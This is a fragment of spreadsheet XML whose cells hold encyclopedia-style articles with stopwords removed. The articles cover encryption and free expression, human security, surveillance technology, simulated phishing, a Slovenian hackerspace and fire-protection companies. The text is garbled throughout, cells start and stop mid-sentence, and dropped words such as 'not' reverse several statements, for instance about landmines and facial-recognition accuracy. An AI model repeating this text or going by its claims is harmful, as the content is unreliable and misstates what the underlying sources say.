iccpr legally binding international treaty.restrictions right freedom expression permitted conditions article paragraph restrictions shall provided shall necessary respect rights reputations others protection national security public order public health morals. possibility restriction art. iccpr, context limitations cryptography, restrictions often based article (3)(b), i.e. risks national security public order. this raises complex issue relation, distinction, security individual, e.g. interference personal electronic communications, national security. right privacy protects 'arbitrary unlawful interference' one's privacy, one's family, one's home one's correspondence. additionally, article 17(1) iccpr protects 'unlawful attacks' one's honor reputation. scope article broad. privacy understood right control information one's self. possibility live one's life sees fit, within boundaries law, effectively depends information others inform behavior towards that part core justification protecting privacy human right.in addition duty infringe rights, states positive obligation effectively ensure enjoyment freedom expression privacy every individual jurisdiction. these rights conflict rights interests, dignity, equality life security individual legitimate public interests. cases, integrity right value must maintained maximum extent, limitations required balancing law, necessary proportionate (especially least restrictive) view legitimate (such rights others, public morals national security). guaranteeing "uninhibited communications" encryption supports mode communication allowing people protect integrity, availability confidentiality communications. requirement uninhibited communications important precondition freedom communication, acknowledged constitutional courts e.g. supreme court german bundesverfassungsgericht well european court human rights. more specifically, meaningful communication requires people's ability freely choose pieces information develop ideas, style language select medium communication according personal needs. uninhibited communication also precondition autonomous personal development. human beings grow personality communicating others. un's first special rapporteur privacy, professor cannataci, stated "privacy enabling right opposed itself, also essential right enables achievement over-arching fundamental right free, unhindered development one's personality". case communication inhibited, interaction biased statement reflect speaker's true (innermost) personal views unduly influenced considerations shape communication first place. therefore, process forming one's personality social interaction disrupted. complex society freedom speech become reality people right speak. second level guarantees need protect precondition making right express oneself. risk surveillance right protect freedom speech means encryption considered second level rights. thus, restriction availability effectiveness encryption constitutes interference freedom expression right privacy protects private life correspondence. therefore, assessed terms legality, necessity purpose. procedures transparency freedom expression right privacy (including right private communications) materially protect certain behavior personal state. well established fundamental rights theory substantive rights complemented procedural guaranties effective. those procedural guarantees rights right effective remedy. however, important acknowledge procedural rights must, similar substantive rights, accompanied specific procedural duties governments without rights would erode. substantial rights construed also contain duty make governance systems transparent, least extent allows citizens assess made decision measures taken. aspect, transparency ensures accountability. precondition know dangers fundamental rights make respective freedoms. security intermediaries effectuation human rights protection requires involvement service providers. these service providers often intermediaries facilitating expression communication users different kinds. debates cryptographic policy, question lawful government access conditions access take place order respect human rights vertical national focus. complexities jurisdiction lawful government access significant present still unsolved puzzle. particular, dramatic shift traditional lawful government access digital communications targeting telecommunications providers s</t>
  </si>
  <si>
    <t>Human security</t>
  </si>
  <si>
    <t>human security paradigm understanding global vulnerabilities whose proponents challenges traditional notion national security military security arguing proper referent security human rather national level. human security reveals people-centred multi-disciplinary understanding security involves number research fields, including development studies, international relations, strategic studies, human rights. united nations development programme's 1994 human development report considered milestone publication field human security, argument ensuring "freedom want" "freedom fear" persons best path tackle problem global insecurity.critics concept argue vagueness undermines effectiveness, become little vehicle activists wishing promote certain causes, help research community understand security means help decision makers formulate good policies. alternatively, scholars argued concept human security broadened encompass military security: words, thing called ‘human security’ concept ‘the human’ embedded heart address question human condition directly. thus understood, human security would longer vague amorphous add-on harder edged areas security military security state security.'in order human security challenge global inequalities, cooperation country's foreign policy approach global health. however, interest state continued overshadow interest people. instance, canada's foreign policy, "three ds", criticized emphasizing defense development. origins emergence human security discourse product convergence factors cold war. these challenged dominance neorealist paradigm's focus states, “mutually assured destruction” military security briefly enabled broader concept security emerge. increasingly rapid pace globalization; failure liberal state building instruments washington consensus; reduced threat nuclear superpowers, exponential rise spread consolidation democratization international human rights norms opened space ‘development’ concepts ‘security’ could reconsidered. time increasing number internal violent conflicts africa, asia europe (balkans) resulted concepts national international security failing reflect challenges post cold security environment whilst failure neoliberal development models generate growth, particularly africa, deal consequences complex threats (such climate change) reinforced sense international institutions states organized address problems integrated way. principal possible indicators movement toward individualized conception security first place evolution international society's consideration rights individuals face potential threats states. obvious foci analysis charter, declaration human rights (1948) associated covenants (1966), conventions related particular crimes (e.g., genocide) rights particular groups (e.g., women, racial groups, refugees). concept undp's 1994 definition mahbub first drew global attention concept human security united nations development programme's 1994 human development report sought influence un's 1995 world summit social development copenhagen. undp's 1994 human development report's definition human security argues scope global security expanded include threats seven areas: economic security economic security requires assured basic income individuals, usually productive remunerative work last resort, publicly financed safety net. sense, quarter world's people presently economically secure. while economic security problem serious developing countries, concern also arises developed countries well. unemployment problems constitute important factor underlying political tensions ethnic violence. food security food security requires people times physical economic access basic food. according united nations, overall availability food problem, rather problem often poor distribution food lack purchasing power. past, food security problems dealt national global levels. however, impacts limited. according tackle problems relating access assets, work assured income (related economic security). health security health security aims guarantee minimum protection diseases unhealthy lifestyles. developing countries, major causes death traditionally infectious parasitic diseases, whereas industrialized countries, major killers diseases circulatory system. today, lifestyle-related chronic diseases leading killers worldwide, percent deaths chronic diseases occurring low- middle-income countries. according united nations, developing industrial countries, threats health security usually greater poor people rural areas, particularly children. this malnutrition insufficient access health services, clean water basic necessities. environmental security environmental security aims protect people short- long-term ravages nature, man-made threats nature, deterioration natural environment. developing countries, lack access clean water resources greatest environmental threats. industrial countries, major threats pollution. global warming, caused emission greenhouse gases, another environmental security issue. personal security personal security aims protect people physical violence, whether state external states, violent individuals sub-state actors, domestic abuse, predatory adults. many people, greatest source anxiety crime, particularly violent crime. community security community security aims protect people loss traditional relationships values sectarian ethnic violence. traditional communities, particularly minority ethnic groups often threatened. about half world's states experienced inter-ethnic strife. united nations declared 1993 year indigenous people highlight continuing vulnerability million aboriginal people countries face widening spiral violence. political security political security concerned whether people live society honors basic human rights. according survey conducted amnesty international, political repression, systematic torture, treatment disappearance still practised countries. human rights violations frequent periods political unrest. along repressing individuals groups, governments exercise control ideas information.since then, human security receiving attention global development institutions, world bank. tadjbakhsh, among others, traces evolution human security international organizations, concluding concept manipulated transformed considerably since 1994 organizational interests. freedom fear freedom want beyond ideal world, undp's seven categories threats (and perhaps others broader discussion might prioritize) would receive adequate global attention resources. attempts implement human security agenda emergence major schools thought best practice human security '"freedom fear"' '"freedom want"'. while undp 1994 report originally argued human security requires attention freedom fear freedom want, divisions gradually emerged proper scope protection (e.g. threats individuals protected from) appropriate mechanisms responding threats. freedom fear this school seeks limit practice human security protecting individuals violent conflicts recognizing violent threats strongly associated poverty, lack state capacity forms inequities. this approach argues limiting focus violence realistic manageable approach towards human security. emergency assistance, conflict prevention resolution, peace-building main concerns approach. canada, example, critical player efforts landmines incorporated "freedom fear" agenda primary component foreign policy. however, whether “narrow” approach truly serve purpose guaranteeing fruitful results remains issue. instance, conflicts darfur often used questioning effectiveness "responsibility protect”, component freedom fear agenda. freedom want school advocates holistic approach achieving human security argues threat agenda broadened include hunger, disease natural disasters inseparable concepts addressing root human insecurity kill people war, genocide terrorism combined. different "freedom fear", expands focus beyond violence emphasis development security goals.despite differences, approaches human security considered complementary rather contradictory. expressions effect include: franklin roosevelt's famous four freedoms speech 1941, "freedom want" characterized third "freedom fear" fourth fundamental, universal, freedom. government japan considers freedom fear freedom want equal developing japan's foreign policy. moreover, undp 1994 called world's attention agendas. surin pitsuwan, secretary-general asean 2008-2012 cites theorists hobbes, locke, rousseau hume conclude "human security primary purpose organizing state beginning.". goes observe 1994 human development report states "reviving concept" suggests authors 1994 alluding franklin roosevelt's four freedoms speech without literally citing presentation.although "freedom fear" "freedom want" commonly referred categories human security practice, increasing number alternative ideas continue emerge best practice human security. among them: paul james. james asks apparently simple questions: firstly, why, 'the human’ category definition encompasses considerations governance, state military, military security continue treated prior, significant, even equal human security. contrast, "when children play ‘category’ games", says, "they implicitly understand issues ordering". secondly, human security narrowly defined terms liberal notions 'freedom': freedom want freedom fear. response questions, provides following alternative definition, human security encompassing military security:human security defined foundational conditions human, including sustainable protection provision material conditions meeting embodied needs people, protection variable existential conditions maintaining dignified life. within definition makes sense core focus human-security endeavours vulnerable. makes sense risk management responsive immediate events processes extensive intensive impact producing material existential vulnerabilities people general category persons across particular locale.: king murray. king murray narrow human security definition one's "expectation years life without experiencing state generalized poverty". definition, "generalized poverty" means "falling critical thresholds domain well-being"; article, give brief review categories "domains well-being". this definition similar "freedom want" concretely focused value system. caroline thomas. regards human security describing condition existence" entails basic material needs, human dignity, including meaningful participation life community, active substantive notion democracy local global. roland paris. argues many ways define "human security" related certain value lose neutral position. suggests take human security category research. such, gives matrix illustrate security studies field.sabina alkire. different approaches seek narrow specify objective human security, sabina alkire pushes idea step safeguard vital core human lives critical pervasive threats, without impeding long-term human fulfilment". concept such, suggests "vital core" cover minimal basic fundamental functions related survival, livelihood dignity; institutions least necessarily protect core intervention. lyal sunga. 2009, professor sunga argued concept human security fully informed international human rights law, international humanitarian law, international criminal international refugee law, takes account relevant international legal norms prohibiting force international relations, likely prove valuable international legal theory practice longer term, concept human security meet conditions fields represent objectified political states rather subjective biases scholars.the first university textbook human security, edited alexander lautensach sabina lautensach, appeared open access form 2020. according four pillar model, human security rests four pillars sociopolitcal security, economic security, environmental security health security. because focus long term well immediate needs, environmental pillar human security assumes prime significance. necessitates attention utter dependence human welfare integrity ecological support structures. relationship traditional security coined early 1990s, term human security used thinkers sought shift discourse security away traditional state-centered orientation protection advancement individuals within societies. human security emerged challenge ideas traditional security, human traditional national security mutually exclusive concepts. argued that, without human security, traditional state security cannot attained vice versa. traditional security state's ability defend external threats. traditional security (often referred national security state security) describes philosophy international security predominance since peace westphalia 1648 rise nation-states. while international relations theory includes many variants traditional security, realism liberalism, fundamental trait schools share focus primacy nation-state. following table contrasts four differences perspectives: relationship development human security also challenged drew practice international development. traditionally, embracing liberal market economics considered universal path economic growth, thus development humanity. yet, continuing conflict human rights abuses following cold fact two-thirds global population seemed gained little economic gains globalization, fundamental questions development practiced. accordingly, human development emerged 1990s challenge dominant paradigm liberal economy development community. human development proponents argue economic growth insufficient expand people's choice capabilities, areas health, education, technology, environment, employment neglected. human security could said enlarge scope examining causes consequences underdevelopment, seeking bridge divide development security. often, militaries address factor underlying causes violence insecurity development workers often underplayed vulnerability development models violent conflict human security springs growing consensus fields need fully integrated order enhance security all. paper "development security" frances stewart argues security development deeply interconnected. human security forms important part people’s well-being, therefore objective development. objective development “the enlargement human choices”. insecurity cuts life short thwarts human potential, thereby affecting reaching objective. lack human security adverse consequences economic growth, therefore development. some development costs obvious. example, wars, people join army flee longer work productively. also, destroying infrastructure reduces productive capacity economy. imbalanced development involves horizontal inequalities important source conflict. therefore, vicious cycles lack development leads conflict, lack development, readily emerge. likewise, virtuous cycles possible, high levels security leading development, promotes security return.further, could also said practice human development human security share three fundamental elements: first, human security human development people-centered. they challenge orthodox approach security development i.e. state security liberal economic growth respectively. both emphasize people ultimate ends means. both treat human agents empowered participate course. second, perspectives multidimensional. both address people's dignity well material physical concerns. third, schools thought consider poverty inequality root causes individual vulnerability.despite similarities, relationship development contested areas human security "freedom fear" advocates, andrew mack, argue human security focus achievable goals decreasing individual vulnerability violent conflict, rather broadly defined goals economic social development. others, tadjbakhsh chenoy, argue human development human security inextricably linked since progress enhances chances progress another failure increases risk failure another.the following table adopted tadjbakhsh help clarify relationship concepts. relationship human rights human security indebted human rights tradition (the ideas natural natural rights). development human security model seen drawn upon ideas concepts fundamental human rights tradition. both approaches individual main referent argue wide range issues (i.e. civil rights, cultural identity, access education healthcare) fundamental human dignity. major difference models approach addressing threats human dignity survival. whilst human rights framework takes legalistic approach, human security framework, utilizing diverse range actors, adopts flexible issue-specific approaches, operate local, national international levels. nature relationship human security human rights contested among human security advocates. some human security advocates argue goal human security build upon strengthen existing global human rights legal framework. however, advocates view human rights legal framework part global insecurity problem believe human security approach propel move beyond legalistic approach underlying sources inequality violence root causes insecurity today's world. relationship non-governmental organizations also: non-governmental organization term (non government organisation) cannot simply defined complexities surrounding structure, environment complex relations shares internal factions; organisational mission, membership sources funding, external factors relationship shares actors; detailing economic, political societal constructs bound generic understanding term refer actions taken interests independent, voluntary contributors exist independently governments corporations, designed represent provide collective voice individuals regarding issues. these issues cover contributions fields industries human development, health nutrition, human rights education, environmental concerns; influence affect human security. traditional roles ngos classified three components, accordance lewis:- implementer: refers mobilisation resources order provision goods services, service delivery. catalyst: refers emotional psychological aspect ngos ability inspire, facilitate contribute spur action thinking. partner: refers ngos relationships shared external actors governments, donors private sector players joint activities, projects communities, purpose strengthen relationship ngos partners mutually beneficial fashion. expansion roles culminated assisting creation society ngos serve important players global arena regards maintaining human security. increasing influence emergence growing natural man-made disasters, ngos contracted governments order adequately respond crises, well assist individual collectivised groups citizens lobbying interests; thus culminating ability enact, influence change government agendas. however, ngos still largely dependent certain levels government funding, hence critics argue ngos pose ability potentially damage issues human security financial dependence. despite critiques, focus, expertise infrastructure developed ngos activities linked human development human rights allow make unique contributions human security provision. relationship environment comprehensive human security attempts unify environmental security together social (societal) security. great number intertwined environmental social components together create framework comprehensive human security assumption neither categories attainable long without synergy two. that trends environmental, resource, population stresses intensifying increasingly determine quality human life planet large determining factor social security.arthur westing posits interdependent branches comprehensive human security broken series subcomponents better achieve optimal environmental social security. environmental security composed subcomponents: rational resource utilization, resource “meets needs present without compromising ability future generations meet needs.” social security simplified components established political safeguards, economic safeguards, personal safeguards, military safeguards.the international institute sustainable development (iisd) states major goal comprehensive human security “transmit practical recommendations policy-makers strengthen human security better environmental management effective natural resource governance.” overreaching goal pervasive global mindset recognizes interdependent natures natural environment collective social security. gender human security human security focuses serious neglect gender concerns traditional security model. traditional security's focus external military threats state meant majority threats women face overlooked. recently argued forms violence often overlooked expressions masculinity contexts become norm. focusing individual, human security model aims address security concerns women equally. however, recent conflicts, believed majority casualties civilians "such conclusion sometimes assumptions women victimized greater extent men, majority adult civilians women, populations civilian women children added together, outnumber male combatants. furthermore, post-war context women survivors generally outnumber often said women group bear greater burden post-war recovery". women often victims violence conflict: form majority civilian deaths; majority refugees; and, often victims cruel degrading practices, rape.: women's security also threatened unequal access resources, services opportunities.: 97–100 special rapporteur violence against women, 1995, suggested problem social one, requires evaluation political institutions uphold unequal system domination. women's rights neglected especially middle east southeast asian regions customary practices still prevalent. although different opinions issue customary practices, infringes upon human security's notion women innated equal human rights. attempts eradicate violent customary practices requires political legal approaches human security relation gender brought main source assertion. such cruel customary practices honor killing, burning brides widows, child marriage still existence women's vulnerability economic independence security. human security relationship gender tries overthrow traditional practices incompatible rights women. also human security seeks empower women, education, participation access, gender equality seen necessary precondition peace, security prosperous society.: 105–107 feminist critiques human security rape weapon theory during times conflict, certain varieties masculinity come celebrated state, varieties behaviors influence population's combatants come behave, expected behave crises. these behaviors range acting aggressively exemplifying hyper-masculine behaviors, playing upon rise "nationalist ethnic consciousness" secure "political support cause undermine "the other". overtly militaristic societies utilized rape sexually violent acts gains within context war, also using practices violence rewards (often male) combatants. this tactic undermines enemy's morale, seen "unable protect women". category human recent feminist critiques human security often find difficulties concept categorization "human". this categorization made influence certain value systems inherently exclusive nature. instance, liberal definition "human" someone independent capable making decisions themselves. this definition problematic excludes persons independent, persons disabilities, human security rights. human security entirely inclusive would need challenge current definition "human" operates acknowledge different abilities also require rights. eurocentrism concept human security developed precepts forth united nations, wherein critique human security's focus deemed acceptable behaviors. human security perspectives view practices child marriage female genital mutilation threat human (more specifically female) security well-being global north, common events occur predominately global southern states. thus seen states traditional human security outlook, duty intervene perpetuate eurocentric ideal human security looks like, best protect familiar concept women. this seen infringement traditional practices found within sovereign states global south, threat ways life processes development. prevent, react, rebuild human security seeks address underlying causes long-term implications conflicts instead simply reacting problems, traditional security approach often accused doing. "the basic point preventive efforts course, reduce, hopefully eliminate, need intervention altogether,": investment rehabilitation rebuilding seeks ensure former conflicts breed future violence. concepts prevention rebuilding clearly embraced “responsibility prevent” well elaborated "the responsibility protect report international commission intervention state sovereignty." relationship humanitarian action several senses natural human security concepts humanitarian principles. concern protection people individuals core humanitarian value well human security. sense shares human security's merging development security casting protection life referent object. human security humanitarian action also shared similar process evolution. rise human security discourse 1990s paralleled equally rapid expansion humanitarian roles broadening objectives humanitarianism labeled ‘new humanitarianism’. humanitarian assistance, encompassing narrow emergency based life saving interventions conducted small group relatively independent actors, became organising principle intervention internal conflicts, tool peacebuilding starting-point addressing poverty, well palliative times conflict crisis.’ also merged development concerns promotion social justice societal cohesion. human security discourse also used tool resist policies becoming hijacked narrow security concerns. states, republic ireland, promoted human security concept ensure balanced approach security development issues nationally within despite sense natural human security concepts humanitarian principles enjoyed difficult relationship. human security perspectives potential interfere traditionally apolitical nature humanitarianism conflict situations, leading blurring boundaries politico-military interventions designed primarily reduce suffering. another sense emphasis human security legitimised idea armed international intervention "moral duty" states deemed incapable unwilling protecting citizens. similarly adoption 'holistic' security development strategies within integrated peacekeeping missions viewed potential compromise humanitarian principles. authors white cliffe drew attention 'broadening objectives pure survival support towards rehabilitation, development and/ peace-building' 'dilution commitment core humanitarian principles'. furthermore, many humanitarian organisations sought develop rights-based approaches assistance strategies challenge apolitical approach traditional humanitarianism. rights based approaches view poverty vulnerability rooted power relations specifically, denial power, related denial human rights. hence rights based approaches humanitarian action relate achievement security marginalized people realization human rights often broader social change. multimandate humanitarian organisations seek inclusive participatory forms citizenship governance achievement broader social rights outcomes therefore risk enmeshing apolitical humanitarian responses advocacy programmes push broader social changes. practice while numerous examples human security approach action, notable global political events direct ties human security agenda include development responsibility protect (r2p) principles guiding humanitarian intervention passage ottawa treaty banning anti-personnel landmines. humanitarian intervention application human security highly relevant within area humanitarian intervention, focuses addressing deep rooted multi-factorial problems inherent humanitarian crises, offers long term resolutions. general, term humanitarian intervention generally applies state uses force another state order alleviate suffering latter state (see, humanitarian intervention). under traditional security paradigm humanitarian intervention contentious. discussed above, traditional security paradigm places emphasis notion states. hence, principles state sovereignty non-intervention paramount traditional security paradigm make difficult justify intervention states internal disputes. through development clear principles based human security concept, step forward development clear rules humanitarian intervention occur obligations states intervene internal disputes state. these principles humanitarian intervention product debate pushed united nations secretary general kofi annan. posed challenge international community find approach humanitarian intervention responded inherent problems. 2001, international commission intervention state sovereignty (iciss) produced "responsibility protect", comprehensive report detailing “right humanitarian intervention” could exercised. considered triumph human security approach emphasized gathered much needed attention main principles: protection individual welfare important state. security individuals threatened internally state externally states, state authority overridden. addressing root causes humanitarian crises (e.g. economic, political social instability) effective solve problems protect long-term security individuals. prevention best solution. collective understanding deeper social issues along desire work together necessary prevent humanitarian crises, thereby preventing widespread absence human security within population (which mean investing development projects).the report illustrates usefulness human security approach, particularly ability examine cause conflicts explain justify humanitarian intervention. addition, could also paradigm identifying, prioritizing resolving large transnational problems, fundamental factors stimulus humanitarian intervention first place. however, human security still faces difficulties concerning scope applicability, large problems requiring humanitarian intervention usually built array socio-political, cultural economic problems beyond limitations humanitarian projects. hand, successful examples human security principles within interventions found. success humanitarian intervention international affairs varied. discussed above, humanitarian intervention contentious issue. examples humanitarian intervention illustrate, cases intervention lead disastrous results, srebrenica somalia. cases, lack clarity rules intervention occur resulted tragic inaction, witnessed rwandan genocide. example successful humanitarian intervention also humanitarian principles applied east timor which, prior independence, plagued massive human rights abuses pro-indonesian militias insurgency indigenous east timorese indonesian forces. peacekeeping mission deployed safeguard move independence established united nations transitional administration east timor (untaet). this dealt traditional security priorities, also helped nation building projects, coordinated humanitarian civil rehabilitation, illustrating successful humanitarian intervention also effective application human security principles. anti-personnel landmines contrast traditional security discourse sees security focused protecting state interests, human security proponents believe anti-personnel mines could viable weapons massive collateral damage cause, indiscriminate nature persistence conflict. particular, argue anti-personnel mines differ weapons, aimed fired since potential kill maim long warring parties ceased fighting. united nations reckoned landmines least times likely kill injure civilian conflict combatant hostilities. effects also long-lasting. icbl estimates anti-personnel mines cause 5,751 casualties 2006. whereas traditionally, states would justify negative impacts mines advantage give battlefield, human security lens, untenable wide-ranging post-conflict impact day-to-day experience individuals outweighs military advantage. ottawa convention, banning anti-personnel landmines, seen victory human security agenda. ottawa convention proved huge step forward 'freedom fear' approach. ottawa, negotiations moved outside traditional disarmament forums, thus avoiding entrenched logic traditional arms control measures.: according hubert, advocate human security canadian department foreign affairs, main reason success multilateral focus. while ingo's like icrc remain players along middle power states like norway canada, actual power push comes involvement host civil society actors (ngos) general public. human security proponents believe treaty standards humanitarian advocacy acted landmark international lawmaking secure world. critics treaty, however, caution complacency success. man</t>
  </si>
  <si>
    <t>Human–computer interaction (security)</t>
  </si>
  <si>
    <t>hcisec study interaction humans computers, human–computer interaction, specifically pertains information security. aim, plain terms, improve usability security features user applications. unlike hci, roots early days xerox parc 1970s, hcisec nascent field study comparison. interest topic tracks internet security, become area broad public concern recent years. when security features exhibit poor usability, following common reasons: added casual afterthought hastily patched address newly discovered security bugs address complex cases without benefit software wizard interface designers lacked understanding related security concepts interface designers usability experts (often meaning application developers themselves) further reading "design principles patterns computer systems that simultaneously secure usable", simson garfinkel "user interaction design secure systems" ka-ping "involving user access control: confined processes trusted human-computer interface" french) mickaël salaün external links hcisec bibliography hcisec yahoo! group usable security blog</t>
  </si>
  <si>
    <t>Hyper-surveillance</t>
  </si>
  <si>
    <t>hyper surveillance intricate surveillance entire substantial fraction population order monitor group citizens specifically utilizes technology security breaches access information. reliance internet economy grows, smarter technology higher surveillance concerns snooping means workers increased surveillance workplace. hyper surveillance highly targeted intricate observation monitoring among individual, group people, faction. history middle 1970s, american penal system prison system expanded rapidly. result, adults correctional supervision nationwide. surveillance systems created targeted specific supervision. surveillance systems targeted black latino men. consequently, color found stopped police higher rates. example, neighborhoods, police stop 1000 residents lifetime hyper surveillance systems.hyper surveillance extends beyond crime control agents police system documented schools, community organizations, places.research finds hyper surveillance lead targeted specific focus individual leading profiling predictive policing. hyper-surveillance technology facial recognition systems constructed computer programs, facial recognition systems analyze images biometrics human faces purpose identification. compared facial systems, recognition software used surveillance security. alongside public video cameras, used passive structure. therefore, facial recognition software used without knowledge consent person.practically, technology used state centers, offices, workplaces. state departments possess photographs constituents utilize information resource alongside public surveillance tools create system identification tracking. mobile tracking systems mobile phone tracking system process identifies location mobile phone. specifically locates phone radio signals internal built system.the technology used observing objects people move specific ordered locational processing. hyper-surveillance consumer technology created hyper surveillance technology clearview some advantages clearview possess include security efficiency. using technology, enforcement able detect shoplifters, traffickers, child abusers, homicide cases. software allows enforcement database three billion pictures allowing police identify suspects efficiently. however, multiple potential negatives including personal abuse, racial bias, inaccurate results, data security. with access millions images, enforcement could abuse technology identify romantic partners foreign governments identify people social status blackmail. availability information makes difficult individual security. addition, clearview proven mistaken misidentify suspects before. facial recognition technologies biases leading misclassifications causing wrongful arrests. fact, company stated tool finds matches time. therefore, situations data inaccurate. major concern clearview facial recognition systems data security. past, clearview hacked client base list leaked. references</t>
  </si>
  <si>
    <t>Single customer view</t>
  </si>
  <si>
    <t>single customer view aggregated, consistent holistic representation data held organisation customers viewed place, single page. advantage organisation attaining unified view comes ability gives analyse past behaviour order better target personalise future customer interactions. single customer view also considered especially relevant organisations engage customers multichannel marketing, since customers expect interactions reflect consistent understanding history preferences. however, commentators challenged idea single view customers across entire organisation either natural meaningful, proposing priority instead consistency multiple views arise different contexts. where representations customer held data set, achieving single customer view difficult: firstly customer identity must traceable records held systems, secondly anomalies discrepancies customer data must data cleansed data quality. such, acquisition organisation single customer view potential outcome successful master data management. since december, 2010, maintaining single customer view, submitting within hours, become mandatory financial institutions united kingdom rules introduced financial services compensation scheme. also data warehouse references</t>
  </si>
  <si>
    <t>Simulated phishing</t>
  </si>
  <si>
    <t>simulated phishing phishing test deceptive emails, similar malicious emails, sent organization staff gauge response phishing similar email attacks. emails often form training, testing normally done conjunction prior training; often followed training elements. this especially case "fail" opening email attachments, clicking included weblinks, entering credentials. rationale there wide acceptance within security field technical measures alone cannot stop malicious email attacks, good training staff necessary. simulated phishing allows direct measurement staff compliance, regularly, measure progress user behavior. phishing simulation recommended various official agencies, often provide guidelines designing policies. phishing simulations sometime compared fire drills giving staff regular practice correct behaviour. ethics such campaigns need authorised appropriate level carried professionally. technique used carelessly, breach laws, attract lawsuits, antagonise traumatise staff. however, employees advised change policy "the company reserves right send deceptive 'simulated phishing' email staff time time gauge staff security awareness compliance", training guidance given advance, problems occur. some organisations choose require users give consent opting others allow staff option out.the standard advice "failing" staff shamed way, appropriate reasonable provide supportive followup training.some techniques might effective malicious actors normally avoided simulated phishing ethical legal reasons. these would include emails content likely cause distress recipient third-party trademarks, although also sometimes argued covered fair use. methods such testing done number ways. many vendors offer web-hosted platforms this, provide limited free "test" campaigns. wide range freely-available open-source tools allow technical organisations host testing. some email service testing built-in option.because organisations generally multi-layered defences place prevent actual malicious phishing, simulations often require whitelisting place email gateways, anti-virus software proxies allow email reach user desktops devices acted upon. frequency most advice testing done several times year, give staff practice responding correctly, provide management feedback progress staff identifying reporting potentially dangerous email. also phishing fire drill references</t>
  </si>
  <si>
    <t>Kiberpipa</t>
  </si>
  <si>
    <t>kiberpipa (slovene: cyberpipe) hackerspace ljubljana, slovenia, established 2001 part k6/4 institute. after breakup parent organization moving different location 2013 ceased operations 2015. hackerspace operated cultural centre, computer laboratory internet café (with free wireless access) kersnikova ljubljana. kiberpipa engaged primarily open source programming, electronic recycling computer devices. between 2005 2013 also hosted small living computer museum.the mostly volunteer team hackerspace organised workshops, lectures, entertainment information events, around events yearly height activity.in 2013, student organization university ljubljana, owner building kiberpipa originally operated, decided re-purpose building restaurant parking garage. after failing negotiate position within organization, kiberpipa team opted continue operating independently student organization moved location. year, student organization opened hackerspace rampa.in 2014, kiberpipa re-opened location gosposvetska using volunteer work donations. continued organize lectures open source software-related events location closure 2015. 2015 server malfunction also resulted loss kiberpipa website archived content. partnerships events kiberpipa co-operated organizations slovenia, e.g. slo-tech 3delavnica teams, regional multimedia centres (including ljudmila ljubljana digital media lab, kibla multimedia centre) organizations abroad (mama media centre zagreb, hacklab pula example). kiberpipa organised bi-annual haip festival (hack/act/interact/progress festival). kiberpipa member multimedia centres network slovenia. references external links official website kiberpipa entry hackerspaces.org</t>
  </si>
  <si>
    <t>Simprints</t>
  </si>
  <si>
    <t>simprints nonprofit technology company originating university cambridge. company builds biometric fingerprint technology governments, ngos, nonprofits people developing world lack proof legal identity. company promotes portable biometric system designed front line workers. technology uses bluetooth connect android mobile device interoperable existing mhealth systems commcare, odk, dhis2. history simprints emerged 2012 hackathon organised centre global equality sponsored technology company arm. founders simprints include gates-cambridge scholars alexandra grigore, toby norman, daniel storisteanu well royal holloway-university london student tristram norman.in 2014, firm received round saving lives birth seed grant, part grand challenges competition supported agency international development (usaid), government norway, bill melinda gates foundation, grand challenges canada (funded government canada), uk’s department international development (dfid). this funding partially matched ltd, cambridge based semiconductor software company. this provided pilot study partnership brac johns hopkins global mhealth initiative test system health workers gaibandha, bangladesh.in 2015, simprints received another grant innovate (formerly technology strategy board) move prototypes pre-production phase develop verify software. this enabled firm launch pilot project brac later manifested formal partnership.in 2016, simprints developed vero, first production-ready biometric scanner ip65 rated ce/fcc certified. simprints software architecture also conforms data regulation.in 2017, firm round saving lives birth transition scale grant million scale simprints partnership brac’s maternal health program reach million expectant mothers children bangladesh.in 2019, simprints announced 3000 units vero would shipped early 2020. affiliations 2018, partners include brac (mnch monitoring dhaka slums), cohesu (tracking students eliminate jiggers infestation kenya), epri (mnch monitoring nigeria), impact network (attendance tracking zambian schools), possible (mnch monitoring nepal). other partners include arm, johns hopkins university’s global mhealth initiative, searan, smart design therefore.current supporters include holdings, bill melinda gates foundation, grand challenges canada, usaid, global innovation fund, draper richards kaplan foundation, autodesk foundation. references external links official website</t>
  </si>
  <si>
    <t>SimplexGrinnell</t>
  </si>
  <si>
    <t>simplexgrinnell, subsidiary johnson controls, american company specializing active fire protection systems, communication systems testing, inspection maintenance services. company headquarters boca raton, florida; corporate sales marketing offices westminster, massachusetts, company district offices throughout north america. currently largest fire protection company world. grinnell fire protection purchased tyco 1976. tyco bought simplex time recorder company january 2001, us$1.15 billion merged grinnell fire protection, forming simplexgrinnell. september 2016, johnson controls tyco completed merger. 2017, johnson controls announced brand identity simplexgrinnell transitioned johnson controls. simplexgrinnell's fire sprinkler services become grinnell fire protection solutions, separate brand johnson controls. johnson controls continue sell simplex fire security products simplex brand name. corporate history grinnell fire protection company frederick grinnell, 1855 graduate rensselaer institute (now rensselaer polytechnic institute), worked railroad engineering retired chief mechanical engineer general manager jersey city locomotive works. soon retirement, purchased controlling interest providence steam pipe company. grinnell already knew henry parmalee, patented first automatic fire sprinkler head 1874. providence steam partnered parmalee manufactured parmalee sprinkler; grinnell also designed erected piping installations parmalee sprinkler heads fitted. grinnell improved parmalee's first practical automatic sprinkler patented grinnell sprinkler 1882. continual improvements resulted glass disc sprinkler 1890. with slight modifications, sprinkler head still used modern fire sprinkler systems; sprinklers even called grinnells france. 1892, grinnell organized general fire extinguisher company, renamed grinnell fire protection company death 1919. main manufacturing facility north carolina grinnell company-general fire extinguisher company complex. simplex time recorder company meanwhile, edward watkins founded simplex time recorder company 1894. watkins invented patented first practical time clocks, along synchronized clock systems seen schools recent times. company, located gardner, massachusetts, purchased time equipment division 1958. this purchase included ibm's fire protection division. originally, simplex's fire alarm line simply consisted relabeled devices control panels, began introduce redesigned products starting early 1960s. mid-1960s, simplex attempted introduce low-voltage systems; panels success. most simplex's audible notification appliances prior 1990s relabeled benjamin electric, federal signal, faraday, autocall devices. simplex's time-division began lose market share, newly founded fire alarm division significantly prospered. 1970, simplex introduced conventional control panels. 1979, simplex introduced industry's first networked multiplex building control system capable handling fire alarm, security, hvac, synchronized time, watchman's tour. other products simplexgrinnell also markets burglar alarms, systems, nurse call systems. they also provide testing, inspection, maintenance services fire alarm, sprinkler, suppression, security, communication equipment. much lesser degree, company also sells services pull stations, time clocks, master time systems mass notification systems. references external links official website</t>
  </si>
  <si>
    <t>Keyword stuffing</t>
  </si>
  <si>
